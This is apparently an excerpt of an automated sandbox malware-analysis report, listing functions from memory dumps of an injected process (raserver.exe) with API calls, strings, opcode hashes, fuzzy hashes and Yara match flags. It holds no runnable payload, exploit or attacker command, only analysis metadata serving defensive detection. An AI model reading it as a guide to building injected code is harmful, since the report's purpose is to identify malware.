Uniqueness Score: -1.00%

Function 009D9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b89e408ee6d3606abff1b9c3a1752dabe4947bf11bf7e5945247c5814b6e7f7
Instruction ID: a51e53d9305f2e0c05435182c295a7e843ae5944a43d76800657fab4b0a3adb7
Opcode Fuzzy Hash: 5b89e408ee6d3606abff1b9c3a1752dabe4947bf11bf7e5945247c5814b6e7f7
Instruction Fuzzy Hash: BD90027120214403D211615A5508717014597D0381F61D421A4814558DD6968C51B161

Uniqueness

Uniqueness Score: -1.00%

Function 009D9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 6c3ecbcdbfa5b1839768083c60ed88c76218f26ef932fe6f2e32ca0ddd9a9c73
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00A2FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E009DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00a2fdda
0x00a2fde2
0x00a2fde5
0x00a2fdec
0x00a2fdfa
0x00a2fdff
0x00a2fe0a
0x00a2fe0f
0x00a2fe17
0x00a2fe1e
0x00a2fe19
0x00a2fe19
0x00a2fe19
0x00a2fe20
0x00a2fe21
0x00a2fe22
0x00a2fe25
0x00a2fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A2FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A2FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A2FE2B

Memory Dump Source

Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: d4bca438cd9f6cd2cc0acefde1c894bfd3c0892d53b4502edb0400a0b9b3e780
Instruction ID: f4d6d559cb06619944ce20de26c6e356124c7c8901800a09c0d7084d2855e4a9
Opcode Fuzzy Hash: d4bca438cd9f6cd2cc0acefde1c894bfd3c0892d53b4502edb0400a0b9b3e780
Instruction Fuzzy Hash: D5F0FC725405117FD6211B59DD02F337B6AEB84730F154325F614555E1D962FC2097F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: raserver.exe PID: 6748 Parent PID: 3388 raserver.exeCOMMON

Executed Functions

Function 00B081AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00B03B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B03B87,007A002E,00000000,00000060,00000000,00000000), ref: 00B081FD

Strings

.z`, xrefs: 00B081ED, 00B081F8

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 05f9df406d82188d2fad85c5b2f98be6eff1f523da5d2a14eff4c0d6624fd620
Instruction ID: 04a112cfda0e95a2d274c67131aebd5fd3c734f73ae90bb043c0077b40ea74ba
Opcode Fuzzy Hash: 05f9df406d82188d2fad85c5b2f98be6eff1f523da5d2a14eff4c0d6624fd620
Instruction Fuzzy Hash: 3701C9B2215508AFCB08CF98DC95DEB77A9AF8C354F15824CFA5DD7291C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B081B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00B03B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B03B87,007A002E,00000000,00000060,00000000,00000000), ref: 00B081FD

Strings

.z`, xrefs: 00B081ED, 00B081F8

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: bb96539a507a50a8691dfda0527a7cbb209a411a6c1c19236b7a5330e40b7036
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: B9F0B6B2200108ABCB08CF88DC85DEB77EDAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B08260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00B03D42,5E972F59,FFFFFFFF,00B03A01,?,?,00B03D42,?,00B03A01,FFFFFFFF,5E972F59,00B03D42,?,00000000), ref: 00B082A5

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 6bd044182fc6ba5fc818db43328824070bf8e2ba4d2b4f57a7b6040c523e1371
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 12F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158258BA1D97251DA30E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B0825A, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00B03D42,5E972F59,FFFFFFFF,00B03A01,?,?,00B03D42,?,00B03A01,FFFFFFFF,5E972F59,00B03D42,?,00000000), ref: 00B082A5

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1c2f7bb6444cafa4e962f2516774ef935a92aeaf3b9ecf821365ce72da722d72
Instruction ID: 51676239459e2b7417f53c55bf27d8197aeef8c9ca42483493f6a5a8994488f9
Opcode Fuzzy Hash: 1c2f7bb6444cafa4e962f2516774ef935a92aeaf3b9ecf821365ce72da722d72
Instruction Fuzzy Hash: 7DF01DB6210144AFCB04DFA8D880CEB7BADBF8C214B15839DFE5C97252C630E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B08390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AF2D11,00002000,00003000,00000004), ref: 00B083C9

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 6d2defc4f7094f52ec21519985c3d6f6cd7d03e01d412c12e0ec769bc953dbe8
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: FCF01CB1200208ABCB14DF89CC81EE777ADAF88750F118258BE0897241C630F910CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B082DA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00B03D20,?,?,00B03D20,00000000,FFFFFFFF), ref: 00B08305

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 65935a09eb7b281348f9d59c0e40bffcb0d80e4344634c868f3d322b1c03649a
Instruction ID: 52914ea852e9bc7bd1f7d91be4f413accd4e69df2e3416025e1fef78cb077e87
Opcode Fuzzy Hash: 65935a09eb7b281348f9d59c0e40bffcb0d80e4344634c868f3d322b1c03649a
Instruction Fuzzy Hash: 1AE08C32600214ABDB10EF98CC85ED73BA8EF48720F0442A9BE085B282C530FA1086D0

Uniqueness

Uniqueness Score: -1.00%

Function 00B082E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00B03D20,?,?,00B03D20,00000000,FFFFFFFF), ref: 00B08305

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 7f856dedb54fc4364ecba843ab1e72c8dca4196b11e06fe63a54055c2eb85004
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: DFD01275200214ABD710EF98CC45ED77B9CEF44750F154599BA585B282C930FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04B09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0986A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 97cd252a309a1ed6a1e416d603f44c9a6e3378c7f8c29d2ee1ebec8f6c31fc14
Instruction ID: 4eb25103c60e4f6ce8f03cd2fe8ba932e9d122d31648f0815a42afed0ab7257d
Opcode Fuzzy Hash: 97cd252a309a1ed6a1e416d603f44c9a6e3378c7f8c29d2ee1ebec8f6c31fc14
Instruction Fuzzy Hash: CB90027220105413F21161594504707040DD7D0285FD1C866A0415559D9696E962B161

Uniqueness

Uniqueness Score: -1.00%

Function 04B09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0984A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 148045f9a12e4d66be6db46f36fb138837454c9d07cca08103ca7ca6d7667147
Instruction ID: 30b1161517db8187cde22b4c71a6f0a2c6770162dc03e37cf0c1711067c91044
Opcode Fuzzy Hash: 148045f9a12e4d66be6db46f36fb138837454c9d07cca08103ca7ca6d7667147
Instruction Fuzzy Hash: E6900262242091527645B1594404507440AE7E02857D1C466A1405951C8566F866E661

Uniqueness

Uniqueness Score: -1.00%

Function 04B099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B099AA

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6642935c99e2bc94ba30be921c23638264888a5a330d65613d3c8d9d4e69b765
Instruction ID: 5e54396f7144814f222ac6990661e9a59fc7a2d7730a2a9d74281331bb073c2b
Opcode Fuzzy Hash: 6642935c99e2bc94ba30be921c23638264888a5a330d65613d3c8d9d4e69b765
Instruction Fuzzy Hash: AE9002A234105442F20061594414B060409D7E1345F91C469E1055555D8659EC627166

Uniqueness

Uniqueness Score: -1.00%

Function 04B095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B095DA

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 832331e43084c859585cbce67e133f893d1c4cd600af0507feffa655a1eb72bc
Instruction ID: 7e3193b36c45c4e7313d3f75ec813bb31eae64c537b39d7d4de3704e5bd5864c
Opcode Fuzzy Hash: 832331e43084c859585cbce67e133f893d1c4cd600af0507feffa655a1eb72bc
Instruction Fuzzy Hash: 3E9002A220205003620571594414616440ED7E0245B91C475E1005591DC565E8A17165

Uniqueness

Uniqueness Score: -1.00%

Function 04B09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0991A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 634121e1d24c7ddbdd18342af3e2a9b6b12084d1f83fe874be882c6b9ebaa29b
Instruction ID: 2fedbcb97d90651ca2b7cd5dbb6685a74c4b8b133853260e88ce0ac8a4156947
Opcode Fuzzy Hash: 634121e1d24c7ddbdd18342af3e2a9b6b12084d1f83fe874be882c6b9ebaa29b
Instruction Fuzzy Hash: 489002B220105402F240715944047460409D7D0345F91C465A5055555E8699EDE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04B09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0954A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6386f9c375db35895a9b1410ebf54e1c5444980f295a29cc474fff0cfabcdbd
Instruction ID: a8bd66cb0c326fca2cac010c999814f9e6cf62c0b5e97858b30b650b6666ca9f
Opcode Fuzzy Hash: b6386f9c375db35895a9b1410ebf54e1c5444980f295a29cc474fff0cfabcdbd
Instruction Fuzzy Hash: 45900266211050032205A5590704507044AD7D5395391C475F1006551CD661E8716161

Uniqueness

Uniqueness Score: -1.00%

Function 04B096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B096EA

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f87ab3e9b84ec41a69789e15ac7959eb9491bac0163e20430dbc2fc4ef43eef1
Instruction ID: f70d4f711a719384e1a56d746d748b4a85e185275b2d1795fb8abb23f8903206
Opcode Fuzzy Hash: f87ab3e9b84ec41a69789e15ac7959eb9491bac0163e20430dbc2fc4ef43eef1
Instruction Fuzzy Hash: 009002722010D802F2106159840474A0409D7D0345F95C865A4415659D86D5E8A17161

Uniqueness

Uniqueness Score: -1.00%

Function 04B096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B096DA

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
Instruction ID: 7809820b4d748bcbf79e03d33d1142efe8ac550b43a6d02a761c8e62251b9189
Opcode Fuzzy Hash: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
Instruction Fuzzy Hash: EF90027220105842F20061594404B460409D7E0345F91C46AA0115655D8655E8617561

Uniqueness

Uniqueness Score: -1.00%

Function 04B09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0966A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
Instruction ID: 615b8a8342c47465eb7781b76c8f5bdc218ffda24826372951cc019352ff1973
Opcode Fuzzy Hash: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
Instruction Fuzzy Hash: 6F90027220105802F2807159440464A0409D7D1345FD1C469A0016655DCA55EA6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04B09650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0965A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
Instruction ID: 64be197c74f0823c0fa35e8d8cd17716ae694a09c8557d29eaf97282cc539f18
Opcode Fuzzy Hash: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
Instruction Fuzzy Hash: 1D90027220509842F24071594404A460419D7D0349F91C465A0055695D9665ED65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04B09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B09A5A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
Instruction ID: 47b3e3309cf49f5da4e07aa205e24e10dee13f6268ad02dfcae301c33212f093
Opcode Fuzzy Hash: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
Instruction Fuzzy Hash: 8590026221185042F30065694C14B070409D7D0347F91C569A0145555CC955E8716561

Uniqueness

Uniqueness Score: -1.00%

Function 04B09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0978A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
Instruction ID: b8a82f632fa56bf72cb7868dab52028a12b6c00b866e88fc85083968371cbf2d
Opcode Fuzzy Hash: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
Instruction Fuzzy Hash: 9490026A21305002F2807159540860A0409D7D1246FD1D869A0006559CC955E8796361

Uniqueness

Uniqueness Score: -1.00%

Function 04B09FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B09FEA

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
Instruction ID: 023be3e3441bce2b6c47db4864c94f0b8ccdfc22a3f1e7248344157531fa3f18
Opcode Fuzzy Hash: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
Instruction Fuzzy Hash: 0290027231119402F210615984047060409D7D1245F91C865A0815559D86D5E8A17162

Uniqueness

Uniqueness Score: -1.00%

Function 04B09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0971A

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
Instruction ID: a83871d2278dfccabf9281bcc1d791c57444d44abaeea8f0d29d57642b5e6f32
Opcode Fuzzy Hash: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
Instruction Fuzzy Hash: 5B90027220105402F200659954086460409D7E0345F91D465A5015556EC6A5E8A17171

Uniqueness

Uniqueness Score: -1.00%

Function 00B06ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00B06F78

Strings

net.dll, xrefs: 00B06F41, 00B06FC7, 00B06F9F, 00B06FAB, 00B06FD3
wininet.dll, xrefs: 00B06F2E, 00B06F37

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
Instruction ID: 99296b7673d89471da2a5cedf4012f7148b8355e73fc3558061b4cbd94ffcc69
Opcode Fuzzy Hash: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
Instruction Fuzzy Hash: 943190B1601705ABD715DFA8D8A1FA7BBF8EB48700F00855DF61A9B281D730B955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B06EC7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00B06F78

Strings

net.dll, xrefs: 00B06F41, 00B06F9F, 00B06FAB
wininet.dll, xrefs: 00B06F2E, 00B06F37

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6223442132bb19ab46bc7626043372d3c55f5933791cd8ee891ccab1e42f70cf
Instruction ID: 9b1c5556b9aab616113ea70a2c0c86201c8773e037279e1ce29803a6923f9fbd
Opcode Fuzzy Hash: 6223442132bb19ab46bc7626043372d3c55f5933791cd8ee891ccab1e42f70cf
Instruction Fuzzy Hash: 3C318FB1601205ABD715DFA8D8E1FAABFF4EB48704F148059F6199B282D770A855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B084F2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AF3B93), ref: 00B084ED

Strings

.z`, xrefs: 00B084DC, 00B084E8

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 73fbd1f20a3120f426dad5b4f51bd0ce728e978820eefc7e018f3862a6090a7a
Instruction ID: 8adba69238c1ab5b2931d6cd27cad9f40acfe9ed287d094e97cbcf83045c0a71
Opcode Fuzzy Hash: 73fbd1f20a3120f426dad5b4f51bd0ce728e978820eefc7e018f3862a6090a7a
Instruction Fuzzy Hash: FF0175712042146FD724DFA8CC89EDB7BDCDF48750F1046A9FA499B392DA31E9018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B084B3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AF3B93), ref: 00B084ED

Strings

.z`, xrefs: 00B084DC, 00B084E8

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 3f8a10dfcd87a26fd3541b45f6befe7aaeecffb2c57a493fc017fea1e2709753
Instruction ID: ae260de491406586cd2df42623c97257def398a32bdd00c53cab4cbac1aeb068
Opcode Fuzzy Hash: 3f8a10dfcd87a26fd3541b45f6befe7aaeecffb2c57a493fc017fea1e2709753
Instruction Fuzzy Hash: ECF05EB1204204AFDB14EFADDC49DABB7ACEF84750F048599FA4997241DA31E914CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B084C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AF3B93), ref: 00B084ED

Strings

.z`, xrefs: 00B084DC, 00B084E8

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 4b45c30225c27421e3c4df008e0fdaa98ab3e722420479f97df4f0ae61bd4285
